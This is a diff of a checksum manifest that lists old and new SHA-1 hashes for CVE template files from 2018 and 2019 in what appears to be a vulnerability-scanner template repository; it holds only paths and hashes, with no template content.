+http/cves/2018/CVE-2018-10093.yaml:f3f63727891c9e0cb2eb9038ff6004d08e6dcc82 http/cves/2018/CVE-2018-10095.yaml:693fc99ecffaf6a018148ec915e2f036df7a8a5b -http/cves/2018/CVE-2018-10141.yaml:5d252d6574ddbc579a373828727d78de2c6eacca -http/cves/2018/CVE-2018-10201.yaml:5a8fdd34e137a742c1c9275c6a7713d5c5bbc687 -http/cves/2018/CVE-2018-10230.yaml:0fa7705e1aedbed55b7238956cf08ea0e885be12 -http/cves/2018/CVE-2018-10562.yaml:11ca4d568c5d82dcc9bf2108c3fc0504580c169d +http/cves/2018/CVE-2018-10141.yaml:7779ff983b95dbf99b6c2bb64f479a740a659f08 +http/cves/2018/CVE-2018-10201.yaml:238f820b7f877539dd5651f5a98f1d08a0d5ca96 +http/cves/2018/CVE-2018-10230.yaml:0b36902bba783c82a083216bf61410f67c36eb8b +http/cves/2018/CVE-2018-10562.yaml:6415aa24a5d0c76e884db7337c2b3105b94021c5 http/cves/2018/CVE-2018-10818.yaml:a7fa0aec3caa627fe454421831f62bc991eed9d6 -http/cves/2018/CVE-2018-10822.yaml:24f2902a68b8b2b193ef4d26b51f67e637041fa4 +http/cves/2018/CVE-2018-10822.yaml:c9c5f0289da54f6d63433db59a7926bd10ccd988 http/cves/2018/CVE-2018-10823.yaml:6618a7d4fcb625da1d59fb829ea829a029e3d203 -http/cves/2018/CVE-2018-10956.yaml:e406ff5917aed9d37e559d054746a90bb6fa942e -http/cves/2018/CVE-2018-11227.yaml:3a29ea7449fed935b92027337625ff929ef3d5f7 -http/cves/2018/CVE-2018-11231.yaml:31927614dd38c3e31fb452681d993e7154c1aa40 +http/cves/2018/CVE-2018-10956.yaml:71c93e4f0ebf78727fba17a5c1b2fa78c827a928 +http/cves/2018/CVE-2018-11227.yaml:18948bc212490993611a7ae8d248e9967d2c4d0f +http/cves/2018/CVE-2018-11231.yaml:3feaca24aab2a437d80f65b7924cae40dc290c5c http/cves/2018/CVE-2018-11409.yaml:6fdfff18925eb21b11c3f46d55313bf032dc4e31 -http/cves/2018/CVE-2018-11473.yaml:207ceef40821efc2e4138b8e7306b0270e549145 -http/cves/2018/CVE-2018-11709.yaml:14503ee74e6d9543a8848cc085469db7000626cf +http/cves/2018/CVE-2018-11473.yaml:ff5291571a05c29ce1187e2d53f5a228db1e9d94 +http/cves/2018/CVE-2018-11709.yaml:86685df3890cf95ac82f816c33382d21c5c25e57 http/cves/2018/CVE-2018-11759.yaml:204382efd7df17af751ac67bddcc8bd7cea49941 http/cves/2018/CVE-2018-11776.yaml:a36f7ba7796e879ff19d74fc11989596dcf388a1 -http/cves/2018/CVE-2018-11784.yaml:3637e094aff15b0cc2e2d137badeacb2478c69e8 -http/cves/2018/CVE-2018-12031.yaml:5f67c20e52e195056fed3e44e81ef7ac3d9068c6 -http/cves/2018/CVE-2018-12054.yaml:d365402285abd5450d7fbd4b27ba535415b82426 -http/cves/2018/CVE-2018-1207.yaml:fd31a7a8b782086c33de1d8aad9ea21a5c27ee49 -http/cves/2018/CVE-2018-12095.yaml:8dcf820144618324c45a2f19c4d6e58ce319299d -http/cves/2018/CVE-2018-12296.yaml:f86d493d479361e1cb9bb92ab463a749206e1f14 -http/cves/2018/CVE-2018-12300.yaml:5a79a73fcd7987c842bec3821a7f5da369d93e36 +http/cves/2018/CVE-2018-11784.yaml:018381c3c3755e0b882e7d722f0feb6318151b84 +http/cves/2018/CVE-2018-12031.yaml:962236f61612bbcb92386b3385c27ad3d0d8f1f5 +http/cves/2018/CVE-2018-12054.yaml:48cc0ca256af1e9accc5053452bec568b5a1d956 +http/cves/2018/CVE-2018-1207.yaml:87d0990727fd70035f90e743f2b3dc6c4e76fbf6 +http/cves/2018/CVE-2018-12095.yaml:8a512385526ec5322a583d0adb90973729f51f64 +http/cves/2018/CVE-2018-12296.yaml:e76758859b5bcd59f5e2cce731b060c0921b71ff +http/cves/2018/CVE-2018-12300.yaml:8ce253cc98cd73a3f782544a3983949002aee790 http/cves/2018/CVE-2018-12613.yaml:094314d99c7182e2e3858ca35508f930b51c5ae0 http/cves/2018/CVE-2018-12634.yaml:3abe3f739c93a307d7dfa8c0fad24182e4e1fcf0 -http/cves/2018/CVE-2018-12675.yaml:2df2b2080236c56023a20d31716aa3f17bcd1217 -http/cves/2018/CVE-2018-1271.yaml:ac7dbf9714f7c4123c8d5872899cb0d5ec8232a1 -http/cves/2018/CVE-2018-1273.yaml:e57d58454c97cd3f94577316ff9e40f41c5eed54 -http/cves/2018/CVE-2018-12909.yaml:64bb71962dcd3561b8d864d56bf6942e84e0e290 -http/cves/2018/CVE-2018-12998.yaml:e2a81f7179f9858f31c377f5a366013f02154ad6 +http/cves/2018/CVE-2018-12675.yaml:585082968a516e565441dde6599d0afa73e3c168 +http/cves/2018/CVE-2018-1271.yaml:600ba41d350f6558f9dc838a3ace71980ff1cab9 +http/cves/2018/CVE-2018-1273.yaml:c1e5f00e83d2fb71ea997908588da6ca36841023 +http/cves/2018/CVE-2018-12909.yaml:505efaa010a03de3fde209d613793aa89fc9e962 +http/cves/2018/CVE-2018-12998.yaml:d2be45270b2b5826b8a074d408b97b88f8905b11 http/cves/2018/CVE-2018-1335.yaml:b78245c5ca237ca162b3085c826089ac0faafdb9 http/cves/2018/CVE-2018-13379.yaml:b975ad2818baa9df283a614b4f3a87c0537a9a0b -http/cves/2018/CVE-2018-13380.yaml:116aaf7fcaf460fc96183109920041412b046451 -http/cves/2018/CVE-2018-13980.yaml:4b76ec27ca8ce448421c8447193247adfc8d5560 -http/cves/2018/CVE-2018-14013.yaml:fa018200771a50a8f8cd5a104db2ce96e64518e0 -http/cves/2018/CVE-2018-14064.yaml:e0a07e314efeeefe25293e20185be7c1f494b7aa -http/cves/2018/CVE-2018-14474.yaml:830a5c2ca8e019535a1395fc32e1cb8bc7029efd -http/cves/2018/CVE-2018-14574.yaml:5bd697daff07ed29adfb84aa75d2504950386001 +http/cves/2018/CVE-2018-13380.yaml:f805c2b9bb1a81be2e4de3b56ba5ce648949ef49 +http/cves/2018/CVE-2018-13980.yaml:b767a713b23e0db8c612b9def1c680e316b1328d +http/cves/2018/CVE-2018-14013.yaml:2f2e12784f3617079a39a17a0205a587490bbc85 +http/cves/2018/CVE-2018-14064.yaml:7d8d64b5eb9b78e53c4693ca1da27f1bf81a5b05 +http/cves/2018/CVE-2018-14474.yaml:538d564c73e9242777630f4af6f3bad0838e4d2e +http/cves/2018/CVE-2018-14574.yaml:b22f8ba6331242cca4bca221e4cecadd075b3324 http/cves/2018/CVE-2018-14728.yaml:2186f0d0c55614a45b9b3ec640517afccf7ef19b -http/cves/2018/CVE-2018-14912.yaml:b240bf2aff3f19469b5db0a238db041258e21290 -http/cves/2018/CVE-2018-14916.yaml:cc35f08153df4346096171b95cb424406797ea79 -http/cves/2018/CVE-2018-14918.yaml:e6cdd8127af8585ab4e265660e8ee745ffc6ce79 -http/cves/2018/CVE-2018-14931.yaml:6c9c5cd4db27c868f11b2d715e87bde115073d8f -http/cves/2018/CVE-2018-15138.yaml:aa1b3978bea87ccf678ed272f6a1833701932501 -http/cves/2018/CVE-2018-15517.yaml:954f70f19bb8308354bf9b398c52d733ee72cd36 +http/cves/2018/CVE-2018-14912.yaml:8a13365545b507f9bffa0bbe93e9bffb016f5f96 +http/cves/2018/CVE-2018-14916.yaml:7fc82ac2d496cf3c0db77d0e1ab66e1a2f2b170b +http/cves/2018/CVE-2018-14918.yaml:b6f1eaa261daa74e4ca42bc458733e5b9dbeb84e +http/cves/2018/CVE-2018-14931.yaml:b1cd2b3de98c97075dc7245cc6a0fa21c6654cab +http/cves/2018/CVE-2018-15138.yaml:dee96d7153ce2b951a4a370be97c2c2e2d8f0c03 +http/cves/2018/CVE-2018-15517.yaml:aa1887bdb6ef974ffbdbe2e04cedd2317a7b1f8b http/cves/2018/CVE-2018-15535.yaml:333aeabcd402b87f8f0db53747ef9ce0d678ac20 -http/cves/2018/CVE-2018-15745.yaml:694413b3278afec50727e685600a29f0f0813ac6 -http/cves/2018/CVE-2018-15917.yaml:9552b5996c15ed491146f799a54e04afb2511735 +http/cves/2018/CVE-2018-15745.yaml:06db693b79d5dbf4535ae476228960d31b28758a +http/cves/2018/CVE-2018-15917.yaml:12f31220022a954cfb7dcdd34db334dd9895b37a http/cves/2018/CVE-2018-15961.yaml:bfd85de945a3f0be168b8ea7184cbf418ffee108 -http/cves/2018/CVE-2018-16059.yaml:f0f383141243b44b902a5f48e20d5a16219c85db -http/cves/2018/CVE-2018-16133.yaml:d3a2b5ead8fbbf59c36b22ee318516fcda99ff46 -http/cves/2018/CVE-2018-16139.yaml:1ba1f1fd650d9fef55b9d4a87f2fad17ca8c64b5 -http/cves/2018/CVE-2018-16159.yaml:2a21291319d331a71b9f21753072c69dab26d0bc -http/cves/2018/CVE-2018-16167.yaml:389c449659f652301adb70da945bd7c4854d51cb -http/cves/2018/CVE-2018-16283.yaml:6f759b12dbc0cf59cbf012014c624e2f0f7b571b +http/cves/2018/CVE-2018-16059.yaml:cb7d37b410d35e2dc58b97c76ad2fc3d1e56963e +http/cves/2018/CVE-2018-16133.yaml:525aa9964b783823ac352ab4a59b7342c7ea12d3 +http/cves/2018/CVE-2018-16139.yaml:de32af0b585a3f15925e5b548285aa7c220bbd4d +http/cves/2018/CVE-2018-16159.yaml:d2f89e0d9855d664af91b17a702c62cbd161c7a0 +http/cves/2018/CVE-2018-16167.yaml:ce7040c7ffe433ea81032f2c3e80b233b3e7e936 +http/cves/2018/CVE-2018-16283.yaml:4b79256fd02169fd80acd256d91d74c3b422e051 http/cves/2018/CVE-2018-16288.yaml:44e7abcb5356243e054bf3b0827d7606cb7cedfd -http/cves/2018/CVE-2018-16299.yaml:50cef1c73da4a017e8e4cf6c435ca5c045333294 +http/cves/2018/CVE-2018-16299.yaml:4dc250246dfe1340fd708c40b1cfa71959b7a040 http/cves/2018/CVE-2018-16341.yaml:0e46eee24d582952eee8b66879b5817147e220ce -http/cves/2018/CVE-2018-16668.yaml:85e178e3535729b375c1f014bc18136d7f6cfb61 -http/cves/2018/CVE-2018-16670.yaml:9c8bc834a2123dae944f11add691c7dc4478508f -http/cves/2018/CVE-2018-16671.yaml:4a32880f13da1cc4a1a4540de78ba3415db9b784 -http/cves/2018/CVE-2018-16716.yaml:cb4398217b4261b0c057666c5b0cd8936259d8de -http/cves/2018/CVE-2018-16761.yaml:41be7ab926fdd239bdf7bcd3fa3ea0821860a7b5 -http/cves/2018/CVE-2018-16763.yaml:5f545971590f102e23b628ffd30db3664abbafdc -http/cves/2018/CVE-2018-16836.yaml:447083cf4771c1937c167b93c3368c2b428669fb -http/cves/2018/CVE-2018-16979.yaml:6eeb616b914840081f82f65b31179d11e648b92c -http/cves/2018/CVE-2018-17153.yaml:051a8f4dcf39bd460e47af409d783269ea2359ae -http/cves/2018/CVE-2018-17246.yaml:3891aed2b2c2e0103bebc3201a39241c01a4ad8d -http/cves/2018/CVE-2018-17254.yaml:0624b5c5677912254367eccc381a8d5e55b38a4d -http/cves/2018/CVE-2018-17422.yaml:9b2ad74a20dd6abc66bb9d65cdf2386e93071a90 -http/cves/2018/CVE-2018-17431.yaml:b9ef3a6711200cf6c903935a8f2f13f3ab4cacd5 -http/cves/2018/CVE-2018-18069.yaml:2636ff9c97f8f25c39ca78aff8c57cfbdca1fd57 -http/cves/2018/CVE-2018-18264.yaml:f510bd42390b381825be71f3fc32d5f59ea52df7 -http/cves/2018/CVE-2018-18323.yaml:87fa05215bf5e4f96cf8a5f4fd74a81b25963fea -http/cves/2018/CVE-2018-18570.yaml:2844a6d99e320f1b74463e3b8e170e47a2b58670 -http/cves/2018/CVE-2018-18608.yaml:a3b5ec311269de74767db061f783c1795fb56b76 -http/cves/2018/CVE-2018-18775.yaml:bf9e2ad83b5a3a2f66b8672c24d158493e597f15 -http/cves/2018/CVE-2018-18777.yaml:0154599d4b22c5077272a098674fde2e2b92733a +http/cves/2018/CVE-2018-16668.yaml:a2ab9f7330f17b0c3bfaf8991c587fb3f7d48f84 +http/cves/2018/CVE-2018-16670.yaml:bcaa07e7ac66576ce6405cdddde1722c356b9bfd +http/cves/2018/CVE-2018-16671.yaml:8c7365a9f9f93e6c915e95ee6e4d0fabda80058c +http/cves/2018/CVE-2018-16716.yaml:8eb04f36b49fbc3e223189378c2acd4e5fe92c6c +http/cves/2018/CVE-2018-16761.yaml:b6566ca26e14319eb1517e6f3ddde906c8fceb8e +http/cves/2018/CVE-2018-16763.yaml:ce8efd9dd27c8ea010353c0767776bc33a03c52f +http/cves/2018/CVE-2018-16836.yaml:e170907b1d3893e1a9e21ea0ccb1461a3e74d581 +http/cves/2018/CVE-2018-16979.yaml:2cea2d50fb8d48f43e1920d48051aa9d2c15318a +http/cves/2018/CVE-2018-17153.yaml:361455988537bc77e2981964669144561ab1258b +http/cves/2018/CVE-2018-17246.yaml:a59a63a1c11053c2dee8b37cf5c236851382617b +http/cves/2018/CVE-2018-17254.yaml:6b7348be503b9991347c2bb3bf306afbba25bae6 +http/cves/2018/CVE-2018-17422.yaml:f165b2d06a233f8e213b7a5bac7df4081e078489 +http/cves/2018/CVE-2018-17431.yaml:b2816c985d257cde6f6ef074387b0685f43849f5 +http/cves/2018/CVE-2018-18069.yaml:2c8ac1588ca751947265cc3cc46acb5cf95b34a5 +http/cves/2018/CVE-2018-18264.yaml:a5fa37b553f7448b21a89cfff232890f9b7503ae +http/cves/2018/CVE-2018-18323.yaml:0a0f3265ea85050044abc90d6355ed77dfbaf107 +http/cves/2018/CVE-2018-18570.yaml:7ddbd27c4223f752beb5e3c47cc5aa325a24a89c +http/cves/2018/CVE-2018-18608.yaml:3cd9447dab5d78ac67596e4767a8492be4edee53 +http/cves/2018/CVE-2018-18775.yaml:7ed4f47f833dcb3531889d6618ea9ee814b7bd8e +http/cves/2018/CVE-2018-18777.yaml:1e85f1b4259670c80c9dc6d51f8c5a3fd276c57f http/cves/2018/CVE-2018-18778.yaml:54b0d2955ddbb108efd6b7bb47bfd058a6a74d50 -http/cves/2018/CVE-2018-18809.yaml:c1a8c473fd0d5075137ba062845e101e8be7a4b6 -http/cves/2018/CVE-2018-18925.yaml:daa8dcc02bff5a67ec965872df9925d6da5f7f84 -http/cves/2018/CVE-2018-19136.yaml:0649716e3b24da08c7c7c3102a612dd41ad0657e -http/cves/2018/CVE-2018-19137.yaml:56592a356f8d566be02db9febb14d3c82376c5d9 -http/cves/2018/CVE-2018-19287.yaml:54187abd54dbbc669465f9dac60f296d5306b6c7 -http/cves/2018/CVE-2018-19326.yaml:6d27dc82252052d7f2535bef1f75bc60491e61ef -http/cves/2018/CVE-2018-19365.yaml:d94593fa74be7df4b46563543522a3710b1c4065 -http/cves/2018/CVE-2018-19386.yaml:d9c0bc7ab31d4ecc82d6a200bb8627473ed660fd -http/cves/2018/CVE-2018-19439.yaml:250617d2eeb5cf47785111008f28e3762e813306 -http/cves/2018/CVE-2018-19458.yaml:16e3007597af88f5f82c7203d41274a3e24f3ab3 -http/cves/2018/CVE-2018-19749.yaml:5885723c507719ca172497a96b5bbd9008d8bc61 -http/cves/2018/CVE-2018-19751.yaml:35db0bf8caf6ecbbdc6420971d294723cd8f082d -http/cves/2018/CVE-2018-19752.yaml:70bfee41ae21da21c51c4fee5b3a718b61dc4f7e -http/cves/2018/CVE-2018-19753.yaml:6736e012e3bec0190db782405404808d52ec460c -http/cves/2018/CVE-2018-19877.yaml:3a10175f1f4af084eedadfe1c875fafbb6cd3030 -http/cves/2018/CVE-2018-19892.yaml:54b04f333b0e93cdc40e915d64e1e99938134305 -http/cves/2018/CVE-2018-19914.yaml:1489d3b9b605be8ac119c1c9222091b1f126a90f -http/cves/2018/CVE-2018-19915.yaml:135f99b1cb229052af5d1f2733a19109806108e8 -http/cves/2018/CVE-2018-20009.yaml:b2b29e584ba6ffeb834f0120ceef5982fe8451a7 -http/cves/2018/CVE-2018-20010.yaml:df4aad9386b1d60d34346ed60e6edef5ebb162e5 -http/cves/2018/CVE-2018-20011.yaml:38ce289f6dc33c8f8e6fc967913e0bac5cb212c2 -http/cves/2018/CVE-2018-20462.yaml:fa2d16514e10fe34ac333f507465d375f698845c -http/cves/2018/CVE-2018-20463.yaml:7e389ca1e49e3772f4faeb430ee11fc6c7f15451 -http/cves/2018/CVE-2018-20470.yaml:5c07587c5aeb424f1c26a216779def61df3ab018 -http/cves/2018/CVE-2018-20526.yaml:b417eb5ac3fcfed3af36c3fd1121d46543e4737c -http/cves/2018/CVE-2018-20608.yaml:f9a90f9c1827d48ca1cae33cc0d23afd112ce21c -http/cves/2018/CVE-2018-20824.yaml:0f8f846ac025ce8ab57b1a16175bd6a0287a4152 -http/cves/2018/CVE-2018-20985.yaml:d78c3f472bd47024cf7f888666134dd8b8720fe8 -http/cves/2018/CVE-2018-2392.yaml:6ee4b540332b66ade0895d41d2ebaf0289683a00 -http/cves/2018/CVE-2018-2791.yaml:9f82e04670fcb186ae619845e94f0bfe11e63037 +http/cves/2018/CVE-2018-18809.yaml:97ff5e3df81b5b623f7f55bc5ddbf0793e110a74 +http/cves/2018/CVE-2018-18925.yaml:4ff77556d497b829048d272d78a80ab48c3549aa +http/cves/2018/CVE-2018-19136.yaml:fab2790ff8e087e0fbc41641d9ee1001ae3e967c +http/cves/2018/CVE-2018-19137.yaml:2471df6aa8ebf7e706d9c4d59acce70713438098 +http/cves/2018/CVE-2018-19287.yaml:abfd58a001cc643f364e9e6c6096ce4622df1162 +http/cves/2018/CVE-2018-19326.yaml:b7a3fb886f6a961e0ce2b74f742c3ba4d12c8e3d +http/cves/2018/CVE-2018-19365.yaml:dadb2ad1945f69ebb9f33bd4009cf2a57d3b9547 +http/cves/2018/CVE-2018-19386.yaml:067a71cb1c54ccb426e5ed84ec56eee878174251 +http/cves/2018/CVE-2018-19439.yaml:968454a3906fb977339ec923821af29d956d2e16 +http/cves/2018/CVE-2018-19458.yaml:848a0e14bae448182ae12924b1b23efe1751cd9a +http/cves/2018/CVE-2018-19749.yaml:2f39ae671e7b3d85eaafd4c3dda6630fb1c8e644 +http/cves/2018/CVE-2018-19751.yaml:c9e76a6509a1e2f5477a64afe0867dfea826e7a8 +http/cves/2018/CVE-2018-19752.yaml:bfa88f203f4b58b789a1c5b527dd93fd3773d174 +http/cves/2018/CVE-2018-19753.yaml:f6e645fd880d48511a0a71eb3edba320eb0eb08c +http/cves/2018/CVE-2018-19877.yaml:07440f1e09e545e5f1e06130a2cf17697a4cea48 +http/cves/2018/CVE-2018-19892.yaml:c68e44f9a4198ecd74be0419818d655262206f2c +http/cves/2018/CVE-2018-19914.yaml:edf69df32e07c71d4b9a2254dad0ac303f82e2de +http/cves/2018/CVE-2018-19915.yaml:ce4c4bf2f9e582fb87a6b0792e0b73143d821328 +http/cves/2018/CVE-2018-20009.yaml:d9d70947f7035b85c2a0050386caa77eb9bf9482 +http/cves/2018/CVE-2018-20010.yaml:0f88ca6101346b95ac95fb68b595927f49db5df0 +http/cves/2018/CVE-2018-20011.yaml:991c7e88e235d1147fffd492f80139f898c2e057 +http/cves/2018/CVE-2018-20462.yaml:ad27aba602215f2f2b38292b15b59109a955f6b2 +http/cves/2018/CVE-2018-20463.yaml:5ae5cf2850c9703bc84aff2bb3d8c461ee48b353 +http/cves/2018/CVE-2018-20470.yaml:e601f7bf176dd9aeb860d1d58ca41bb07cae9853 +http/cves/2018/CVE-2018-20526.yaml:47097d482a04166534c7297e2a2032263c64227b +http/cves/2018/CVE-2018-20608.yaml:7e2b54a092a3e00b7c3424c5dbcfe87df36232c4 +http/cves/2018/CVE-2018-20824.yaml:1aba7cbb7c890a01bd1c09ccf1340f8319eaa235 +http/cves/2018/CVE-2018-20985.yaml:b63afd13cc5519f6704ad56029c1446d495d77c3 +http/cves/2018/CVE-2018-2392.yaml:3cef3aa5c5c9d4c12176c3eb1f9be2c1431c3d07 +http/cves/2018/CVE-2018-2791.yaml:89e2751f317e41e613885762ec3222de759ec888 http/cves/2018/CVE-2018-2894.yaml:5d7e618d70f45221a913bcc9e348fbd2daad5f34 -http/cves/2018/CVE-2018-3167.yaml:9cc0b2d66409d87d84f7cfb3a3259c5f8c2b3330 -http/cves/2018/CVE-2018-3238.yaml:de7921d2c6b68caf7ad3066842d499ed7da5698b -http/cves/2018/CVE-2018-3714.yaml:3dbfbda00ebe80c90ead44e7d0c13e1bd266a032 -http/cves/2018/CVE-2018-3760.yaml:f734bd4574905b9c66b1c1f50ebd339ff87acc16 -http/cves/2018/CVE-2018-3810.yaml:78c0c56a1c94822dab8f36260ec998050cc5f557 -http/cves/2018/CVE-2018-5230.yaml:992a40360345f862fddd6169bdec91681d82c345 -http/cves/2018/CVE-2018-5233.yaml:4ac29bd4c587a27fd1de441ef788bf358b2b0e80 -http/cves/2018/CVE-2018-5316.yaml:123ef12461925d190371c2ac2058f08605c6943e -http/cves/2018/CVE-2018-5715.yaml:01d4c09b4d3ce7f825ac5d5234ccc0e73b233a43 -http/cves/2018/CVE-2018-6008.yaml:7505c7594c6a86e32a3fead1d9597aa5c01321df -http/cves/2018/CVE-2018-6184.yaml:d3d44669417f86669b5d0857456079832468f1b1 -http/cves/2018/CVE-2018-6200.yaml:38804f3145ca50d2fbb79808cd2a399aeca6bfe3 -http/cves/2018/CVE-2018-6530.yaml:d024505544a73fb55ce854169cc7b926265da0d0 -http/cves/2018/CVE-2018-6910.yaml:b4a56a889838ef14be9062a190fc6ad9149156ce -http/cves/2018/CVE-2018-7251.yaml:0d6918b06cb363650487e7136dba7d099ec1bf56 -http/cves/2018/CVE-2018-7282.yaml:25d2ab25ec9c426285e1f859aa455aa77d6d32e3 -http/cves/2018/CVE-2018-7422.yaml:b2ef55ac6f59c4956e3914f57857f491772b6553 -http/cves/2018/CVE-2018-7467.yaml:615723849e2bfc06c5d3f62eab3c52cf5d41b22d +http/cves/2018/CVE-2018-3167.yaml:2e6d0b5b4b5721084dbd78245d53d02572800bef +http/cves/2018/CVE-2018-3238.yaml:a9560ac86ee708c686a64e43b48bb857efad47c3 +http/cves/2018/CVE-2018-3714.yaml:e4f3f12505488aa5f52d6cf1d2acd3de6bb53453 +http/cves/2018/CVE-2018-3760.yaml:bbd7315908c6c13c7b40487e31908da25c6fd948 +http/cves/2018/CVE-2018-3810.yaml:cf9bdb796fc4dc6ac03830f1e519bb4c0ee570fa +http/cves/2018/CVE-2018-5230.yaml:28f664141a8fc3e4ffc9ca83cf2c77d3b19209f1 +http/cves/2018/CVE-2018-5233.yaml:c13c95f4cd9b84b84e97c68570a14a87f98ad154 +http/cves/2018/CVE-2018-5316.yaml:2f2010616585ed2fe8bef1bb95e45105433d619d +http/cves/2018/CVE-2018-5715.yaml:f00440a303a5a6ae4a667b886b89417175b8a5e4 +http/cves/2018/CVE-2018-6008.yaml:68850caa9460414c29bc2e62ef7c39e9c383c920 +http/cves/2018/CVE-2018-6184.yaml:85819881961a7bf93705464f532ddf2956af5ad6 +http/cves/2018/CVE-2018-6200.yaml:691def5c2691d3ada095c34c1f23f9a1b6da2026 +http/cves/2018/CVE-2018-6530.yaml:95468e7f45742c2355c5b2c089346622c4328f72 +http/cves/2018/CVE-2018-6910.yaml:62b9d2fb217437c896c116b0545aecae68901caa +http/cves/2018/CVE-2018-7251.yaml:a648cd3cd3b9524610e618cfdc7a6b9e50f36139 +http/cves/2018/CVE-2018-7282.yaml:574ef406e2c01c04089cd4d45b5ab9d9b3d34af0 +http/cves/2018/CVE-2018-7422.yaml:9dca212675f08b2bfc709040d0d7946fc4534322 +http/cves/2018/CVE-2018-7467.yaml:5329a156153fb8cb40702fce3310ad0de4f02bd9 http/cves/2018/CVE-2018-7490.yaml:31792531ad634a82d37e3156427d4786d8f5f95c http/cves/2018/CVE-2018-7600.yaml:2f0fd02f9ab28043580327a3eddd64df76b81639 -http/cves/2018/CVE-2018-7602.yaml:e769b1d5902c9c4a238efa3a38347e8e29f0beb8 -http/cves/2018/CVE-2018-7653.yaml:d8ce9c36619df3489bc02ab9a27681e75f437dc3 -http/cves/2018/CVE-2018-7662.yaml:3bfb3917bf2f39f25b0865d7ddd75b6c39cd9605 -http/cves/2018/CVE-2018-7700.yaml:569cabf60a16551ec7fa5043e3fe4c2f3e80480b -http/cves/2018/CVE-2018-7719.yaml:042f247129364758ded509a7b1a28160630e7f40 +http/cves/2018/CVE-2018-7602.yaml:60a12b6bf17551f75211059ec16d4fe60c748ce7 +http/cves/2018/CVE-2018-7653.yaml:2a42b74287edd38ec92561cf9c97d3022cb541ac +http/cves/2018/CVE-2018-7662.yaml:eee95ae6b558f484c84a7c7bad01b4ff360abed7 +http/cves/2018/CVE-2018-7700.yaml:1061036ffde89edfaf3aa19c62d1a98ae844c42e +http/cves/2018/CVE-2018-7719.yaml:1b833582d8ed9177b6fc955a78e15ce9633b860d http/cves/2018/CVE-2018-8006.yaml:9eeb94b0ca21a837a60b1a3ea6db1bd0d29c2035 -http/cves/2018/CVE-2018-8033.yaml:49850b37d1e5d9a53a56ee442b4a83827283fa0f -http/cves/2018/CVE-2018-8715.yaml:7b1f9be47d695b33612632d7fade735ce2d330e9 -http/cves/2018/CVE-2018-8719.yaml:82675dc620d961d57f42ad3c0f9756b8befc6cf8 -http/cves/2018/CVE-2018-8727.yaml:ea4295cd5e178dac45c2cf9ad94a213171c17eab -http/cves/2018/CVE-2018-8770.yaml:3693ba9f55451e3cfe61dde5a5dbf10491968446 -http/cves/2018/CVE-2018-9118.yaml:ab204f5522f000333295daf1c8b90edafc182525 -http/cves/2018/CVE-2018-9161.yaml:84c2db194835486ec0b56f9033152d2fe3f095aa -http/cves/2018/CVE-2018-9205.yaml:5628ba3e3737fbe1d09a29242e323ba1e93ca2ed -http/cves/2018/CVE-2018-9845.yaml:2ba785e9cb89261bb4410e4c13c4c4ccac17077d -http/cves/2018/CVE-2018-9995.yaml:7550422fc44a955cdfb0c0ebed1e0c39c232b9f2 -http/cves/2019/CVE-2019-0193.yaml:d4ef0350320a567f547c8114c7ac943a1743a4f7 -http/cves/2019/CVE-2019-0221.yaml:70f4779f3233697fafee903ea2c5150c7d67f76d +http/cves/2018/CVE-2018-8033.yaml:f3cab6c4f4d21687166f5a7ddb8b9fb9b83cf5f6 +http/cves/2018/CVE-2018-8715.yaml:04cfabeeaaf88b3aa310801f761b61ab36cfe1e3 +http/cves/2018/CVE-2018-8719.yaml:426cb9367d438a67b37eaf3a7618740a83f76bce +http/cves/2018/CVE-2018-8727.yaml:86932f01683f710e6c68fe0ae872cd3fde4e782d +http/cves/2018/CVE-2018-8770.yaml:6c3a7ea811e092cff9763ac1e470b4e5aa459dd8 +http/cves/2018/CVE-2018-9118.yaml:eac0d36e976c52bfb760dfe4661c92be06d3c918 +http/cves/2018/CVE-2018-9161.yaml:e9a17d9b3b8b93da099d89aa4d71d53657569129 +http/cves/2018/CVE-2018-9205.yaml:8920ac0aeca46f7ed1c89001ee6ead66294de5d0 +http/cves/2018/CVE-2018-9845.yaml:2d549d7ac28e9b1ca7c4b9f9400ce9bd4d5dd527 +http/cves/2018/CVE-2018-9995.yaml:16dbd6b17782ca9bb85a4a15f8a6d522ddd1d7bd +http/cves/2019/CVE-2019-0193.yaml:f094789a8b86899846a2a5d7bf1e7aec3efd780d +http/cves/2019/CVE-2019-0221.yaml:43828ad6915694ff9c455ca16ad4f68318455ba5 http/cves/2019/CVE-2019-0230.yaml:b1d5b77c4a866bda8c3cb830dd2e4878ca7e0864 -http/cves/2019/CVE-2019-10068.yaml:b534a4f0e8a3d7746f20fc33123b3df8b4cf5fe8 -http/cves/2019/CVE-2019-10092.yaml:b7013f35f40ba6898ac4bd7f0cfcc76985555b1b -http/cves/2019/CVE-2019-10098.yaml:7999ca884c8e675365bc7a5a35ed80824917b787 -http/cves/2019/CVE-2019-1010287.yaml:9e020b4cb1e2eed3f12b6bc6ceda6ab2f91b770a -http/cves/2019/CVE-2019-1010290.yaml:48e5bab907a413eaa7b9f4ea011459ade103928a -http/cves/2019/CVE-2019-10232.yaml:00b6f3fac359bc9d2c6b1a8604ea480f0bb17713 -http/cves/2019/CVE-2019-10405.yaml:be68c39b90d63af418a5e91f72034ce3f51e580f +http/cves/2019/CVE-2019-10068.yaml:c14f955d91306adc59d3a8cb926c5495afe61d36 +http/cves/2019/CVE-2019-10092.yaml:f48f13f313cf03f4e79e4fd6ab403b6606ef3bfd +http/cves/2019/CVE-2019-10098.yaml:90adce50f21da9a77037b7df8ed95f283d30acf0 +http/cves/2019/CVE-2019-1010287.yaml:789994c42fd298346a26bd988282764dce235fcb +http/cves/2019/CVE-2019-1010290.yaml:324e9e27ab1d258702c5f58fe77f2347c05b9a8c +http/cves/2019/CVE-2019-10232.yaml:3f268cb3dd16f5844d3966eb339600fe6ed3db1d +http/cves/2019/CVE-2019-10405.yaml:25e05f5835df46ba888766f13b24e836ea474c68 http/cves/2019/CVE-2019-10475.yaml:5b1ddd04978edb96b449907fd9ccab93d32b1e55 http/cves/2019/CVE-2019-10692.yaml:900d28c8148d85a16ab562a5cfa69bc760dfaed9 -http/cves/2019/CVE-2019-10717.yaml:fb1b8cc3c0bbcb6b6c689ad5229a3a858e476609 -http/cves/2019/CVE-2019-10758.yaml:a9bff59e22bb70f6f15332b023e075f8b12a5247 -http/cves/2019/CVE-2019-11013.yaml:1d88fd6bae1bd37cc99af2cf76e98b83c379d232 -http/cves/2019/CVE-2019-11248.yaml:5b735cecc415a76ee35b335a1e70c3bd8aea32d6 -http/cves/2019/CVE-2019-11370.yaml:44d56ed8fc81f705dfefc46fbb4fc563f59ef46f +http/cves/2019/CVE-2019-10717.yaml:71b44259eca4d812dbc7d60ef17c5977257931de 